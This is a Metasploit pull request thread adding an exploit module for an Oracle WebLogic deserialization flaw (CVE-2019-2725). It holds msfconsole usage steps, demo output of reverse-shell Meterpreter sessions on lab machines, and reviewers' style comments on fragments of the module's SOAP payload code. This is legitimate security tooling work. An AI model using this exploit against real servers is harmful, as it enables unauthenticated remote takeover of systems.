Add Weblogic deserialize AsyncResponseService module
rapid7/metasploit-framework pull request #11780
Opened 2019-04-26 01:34 UTC by acamro

Hello again,
I've been very busy lately, however, here they have another juicy contribution.
By the way, thank you very much for the acknowledgment in the articles (y)...

Please, add this exploit module for CNVD-C 2019-48814, Oracle Weblogic Deserialization Vulnerability in the WLS AsyncResponseService web service component.
It was tested on Windows 7 x64 and Ubuntu 14.04.4 x64 with Oracle Weblogic Server v10.3.6 and v12.1.3

Please feel free to fix or add things!!!

## TODO
Add more payloads
More tests on Linux
More tests on Solaris
Documentation

## DEMO
```
 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set uripath http://192.168.192.132
 uripath => http://192.168.192.132
 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set wspath /_async/AsyncResponseService
 wspath => /_async/AsyncResponseService
 msf exploit(multi/misc/weblogic_deserialize_unicastref) > set rport 7001
 rport => 7001
 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set lport 8888
 lport => 8888
 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set lhost 192.168.192.129
 lhost => 192.168.192.129
 msf exploit(multi/misc/weblogic_deserialize_unicastref) > exploit
 [*] Started reverse TCP handler on 192.168.192.129:8888
 [*] Generating payload...
 [*] [/_async/AsyncResponseService] Sending payload...
 [*] Sending stage (179779 bytes) to 192.168.192.132
 [*] Meterpreter session 2 opened (192.168.192.129:8888 -> 192.168.192.132:53854) at 2019-04-25 16:49:49 -0700

 meterpreter > sysinfo
 Computer        : GIOTTO-HS-W7
 OS              : Windows 7 (Build 7600).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows
```

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/multi/misc/weblogic_deserialize_asyncresponseservice`
- [x] set uripath
- [x] set wspath
- [x] set rport
- [x] set lhost
- [x] set lport
- [x] exploit
- [x] `sessions -i 1`
- [x] Enjoy!!!

2019-04-26 01:57 UTC, bcoles commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +      xml_cmd = "          <void index=\"0\"> "
Using single quotes `'` would save some escaping, as double quotes `"` are not required.

Also it is unlikely that whitespace is required. This data could be compressed into one or two lines, while maintaining readability.

2019-04-26 01:57 UTC, bcoles commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +    soap_payload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" "
Metasploit contains a SOAP library. There's a bit of a learning curve, but it would make this code much cleaner.

Alternatively, double quotes `"` aren't required for most of these lines (where string interpolation isn't required. In which case, using single quotes `'` would save some escaping.

2019-04-26 01:57 UTC, bcoles commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +	OptString.new('RHOSTS', [false]),
This doesn't need to be defined for `Exploit` modules.

```suggestion
```

2019-04-26 02:39 UTC, bcoles commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +    soap_payload <<  '    <wsa:RelatesTo>#{random_relates}</wsa:RelatesTo> '
```suggestion
    soap_payload <<  "    <wsa:RelatesTo>#{random_relates}</wsa:RelatesTo> "
```

2019-04-26 02:42 UTC, acamro commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +    soap_payload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" "
Could you provide me some of the documentation or examples?

2019-04-26 02:52 UTC, bcoles commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +    soap_payload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" "
Here's an example, from [ibm_openadmin_tool_soap_welcomeserver_exec](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec.rb):

```ruby
  def set_home_page(homepage)
    xml = Document.new
    xml.add_element 'soapenv:Envelope', 'xmlns:xsi'     => 'http://www.w3.org/2001/XMLSchema-instance',
                                        'xmlns:xsd'     => 'http://www.w3.org/2001/XMLSchema',
                                        'xmlns:soapenv' => 'http://schemas.xmlsoap.org/soap/envelope/',
                                        'xmlns:urn'     => 'urn:Welcome'
    xml.root.add_element 'soapenv:Header'
    xml.root.add_element 'soapenv:Body'
    body = xml.root.elements[2]
    body.add_element 'urn:saveHomePage', 'soapenv:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'
    new_home_page = body.elements[1].add_element 'new_home_page', 'xsi:type' => 'xsd:string'
    new_home_page.text = homepage

    uri = normalize_uri target_uri.path, 'services', 'welcome', 'welcomeService.php'
    send_request_cgi 'method'  => 'POST',
                     'uri'     => uri,
                     'ctype'   => 'text/xml; charset=UTF-8',
                     'headers' => { 'SOAPAction' => 'urn:QBEAction' },
                     'data'    => xml.to_s
  end
```

2019-04-26 02:56 UTC, bcoles commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +    soap_payload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" "
Using the XML library isn't a requirement. No-one likes working with XML.

2019-04-26 16:15 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +    soap_payload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" "
Ditto what @bcoles said. I've used a here document for XML before, but you have to be careful about syntax and encoding. `REXML` can quickly get more complicated than it needs to be, but it does offer stricter XML creation.

2019-04-26 16:22 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +require 'msf/core/exploit/powershell'
I don't think this is necessary.

2019-04-26 16:22 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +        'Andres Rodriguez',  # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
You can add the e-mail address directly to the string, but you should leave out everything else.

2019-04-26 16:23 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +          ['CNVD-C', '2019-48814'],
We probably want to add this as a first-citizen reference.

2019-04-26 16:24 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +          [ 'Solaris',
Did you verify this target...?

2019-04-26 16:26 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +      xml_cmd = '          <void index="0"> '
I suggest using here documents for your XML if you're not going to use `REXML`.

https://github.com/rapid7/metasploit-framework/blob/186e2dd65f15ac1deee84f866e6c99fcb4ec62e9/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb#L158-L167

2019-04-26 16:26 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +    if target.name == 'Windows'
This can be a `case` statement.

2019-04-26 16:27 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +  def xml_encode(str)
https://github.com/rapid7/metasploit-framework/blob/186e2dd65f15ac1deee84f866e6c99fcb4ec62e9/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb#L163

2019-04-26 16:28 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +    if res and res.code != 202
```suggestion
    if res && res.code != 202
```

2019-04-26 16:55 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +          [ 'Solaris',
Answered my own question.

2019-04-26 16:56 UTC, wvu requested changes
A few things to update or change. Thanks for the submission!

2019-04-29 14:36 UTC, todb-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +          ['CNVD-C', '2019-48814'],
@wvu-r7 @acamro can you toss in a couple more references here please?

Oracle's advisory: https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html 
CVE: CVE-2019-2625

Thanks!

2019-04-30 21:51 UTC, ccondon-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +          ['CNVD-C', '2019-48814'],
Just a note @todb-r7, CVE is actually CVE-2019-2725.

2019-05-01 02:37 UTC, acamro commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +          ['CNVD-C', '2019-48814'],
I've added the CVE

2019-05-01 02:45 UTC, acamro commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +          ['CNVD-C', '2019-48814'],
Yep, this is the final CVE, thanks.

2019-05-01 03:48 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +    #handler
You can remove this. The handler is called automatically. I'd clean up the whitespace in this method, too.

```ruby
def exploit
  send_payload
end
```

2019-05-01 03:50 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +    #handler
And since `exploit` is now a little sparse, maybe pull the XML out into its own method to shorten `send_payload`, then potentially split that up, too. Readability should be improved.

2019-05-01 03:51 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +      'headers'  => {'SOAPAction' => '' }
This `SOAPAction` is empty?

2019-05-01 04:06 UTC, acamro commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +      'headers'  => {'SOAPAction' => '' }
yes, it's not necessary. However, the header is required by the server to process the soap call.

2019-05-01 04:45 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +      'headers'  => {'SOAPAction' => '' }
Great, thanks!

2019-05-01 04:45 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +          'WfsDelay' => 12
Any reason for 12?

2019-05-01 04:47 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +              'Space'       => 2048,
What's the significance of `Space` and `DisableNops` for Solaris?

2019-05-01 04:47 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +            'Payload' => {},
Empty hash can be removed unless you intend to fill it.

2019-05-01 05:08 UTC, acamro commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +          'WfsDelay' => 12
Sorry, it came from the template (removed).

2019-05-01 05:12 UTC, wvu approved these changes

2019-05-01 05:17 UTC, acamro commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +              'Space'       => 2048,
Sorry, It came from the template (again). It hasn't been tested in Solaris. Since this isn't a memory vulnerability, I remove them.

2019-05-06 20:18 UTC, asoto-r7 commented
@acamro : Thanks again for the quick turnaround!

I compared your `xml_encode` method to your newer commit's `shell_payload.encode(xml: :text)` technique.  There are definitely differences, the latter seems more efficient and just as reliable, so good change!

I went ahead and wrote docs, added a `check` method (from which I'd love feedback), and addressed some of @wvu-r7's stylistic comments.  I also strengthened some exception handling based on my testing to deal with failed exploit attempts.  Lastly, I removed some whitespace in the XML strings for maximum speed!  😃 

I've tested this against Ubuntu and Win10 on WebLogic v10.3.6, as well as against a seemingly non-vulnerable WebLogic 12c (12.2.1.2).  Throwing this against the latter doesn't seem to cause any adverse affects.

Getting ready to land this PR.  👍

2019-05-06 20:30 UTC, asoto-r7 commented
Sanity testing because of a VM / infrastructure failure, not because of anything in the module:

```
testlog:[2019-05-06 20:27:24.574657] PROCESSING: Sanity_Win2016x64
testlog:[2019-05-06 20:27:24.574761] DID NOT FIND VM: Sanity_Win2016x64 ON 10.17.4.6
testlog:[2019-05-06 20:27:24.574833] RESETTING VM Sanity_APT_MSF_HOST
testlog:[2019-05-06 20:27:24.574893] NO TEMP SNAPSHOT FOUND FOR Sanity_APT_MSF_HOST
testlog:[2019-05-06 20:27:24.574958] RESETTING VM Sanity_Win2016x64
testlog:[2019-05-06 20:27:24.575014] NO TEMP SNAPSHOT FOUND FOR Sanity_Win2016x64
testlog:[2019-05-06 20:27:24.575067] THERE WAS A PROBLEM RESETTING VMS
testlog:[2019-05-06 20:27:24.575120] WAITING FOR ALL TASKS TO COMPLETE
testlog:[2019-05-06 20:27:29.580310] TEST FAILED
```

2019-05-06 20:37 UTC, merged

2019-05-06 20:37 UTC, asoto-r7 commented
## Release Notes

`exploit/multi/misc/weblogic_deserialize_asyncresponseservice` exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component.  The exploit provides an unauthenticated attacker with remote arbitrary command execution.

2019-05-07 01:54 UTC, wvu-r7 commented
Great work!!

2019-05-07 01:56 UTC, ccondon-r7 commented
Agreed :) Thanks, all.

2019-05-19 05:32 UTC, wchen-r7 commented
I was working on a bug for Oracle Application Testing Suite and I noticed this also works against its WebLogic service, except this is on port 8088 by default. Just wanted to share for whoever is attacking Oracle services:

```
msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[*] Generating payload...
[*] Powershell command length: 2309
[*] Sending payload...
[*] Sending stage (179779 bytes) to 172.16.135.128
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.128:49211) at 2019-05-19 00:30:29 -0500

meterpreter > 
```

2019-05-19 05:36 UTC, wvu-r7 commented
Don't forget to sleep!

2019-05-20 16:28 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +        OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),
It looks like I neglected to review this entire PR yet approved it. @wchen-r7 noticed that these options appear wrong. `URIPATH` does not appear to be used anywhere, being an `HttpServer` option, and `WSPATH` should be `TARGETURI`.

2019-05-20 16:31 UTC, bcoles commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +        OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),
A question has also been raised regarding the validity of the CVE reference. #11835

2019-05-20 16:44 UTC, wchen-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +        OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),
Ah. So I'm actually in the middle ore reviewing the vulnerability, I can update the module (for the CVE and the datastore options) later. Thank you guys.

2019-05-20 17:29 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +        OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),
Yes, please.

> wvu-r7 approved these changes 20 days ago

When I approved the changes, I was approving only the metadata I reviewed. Apologies for the misunderstanding.

2019-05-20 19:15 UTC, acamro commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +        OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),
Oh, sorry, it's my fault, a little bit confused with this, this is not intentional, of course.
At this moment, I start testing and solve the problem of the payload...
In a couple of hours, I'll be giving updates of the matter.

2019-05-20 20:34 UTC, wchen-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +        OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),
@acamro To be honest, I'm not so confident about the CVE update to CVE-2017-10271. There are other CVE-2019-2725 PoCs that look very similar to yours. Exactly what's the difference between these two? Do you know?

2019-05-20 21:20 UTC, acamro commented on modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
> +        OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),
I'm verifying and could be the payload to exploit, WebLogic and Java have some blacklisted types that mitigate some payloads, in this case, I shouldn't have used a StringBuilder datatype, the real problem was simply a lack of testing (patched versions).